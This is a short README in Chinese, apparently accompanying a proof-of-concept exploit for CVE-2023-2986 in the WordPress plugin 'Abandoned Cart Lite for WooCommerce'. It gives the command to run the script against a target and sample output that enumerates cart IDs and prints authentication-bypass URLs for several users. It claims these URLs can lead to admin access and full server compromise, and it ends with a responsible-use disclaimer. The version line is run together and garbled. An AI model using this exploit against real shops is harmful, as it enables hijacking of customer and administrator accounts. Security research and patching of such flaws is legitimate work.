WordPress 插件 'Abandoned Cart Lite for WooCommerce' 中漏洞 CVE-2023-2986 的概念验证
version <= 5.14.2version <= 5.15.15.15.05.15.25.15.2sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
[*] 正在枚举购物车 ID:1
[+] 用户 'victim' 的身份绕过 URL:https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] 正在枚举购物车 ID:2
[*] 正在枚举购物车 ID:3
[+] 用户 'victim2' 的身份绕过 URL:https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] 正在枚举购物车 ID:4
[+] 用户 'user' 的身份绕过 URL:https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] 正在枚举购物车 ID:5
在浏览器中输入该 URL 即可获得对相应用户账户的访问权限。如果 WordPress 管理员用户本身也有条目,则此操作将导致管理员控制台被访问,从而导致 WordPress 服务器完全沦陷。
本概念验证(POC)纯为学术研究及开发有效防御技术而创建,并非用于攻击未明确授权的系统。作者不对任何滥用此 POC 的行为负责。请负责任地使用。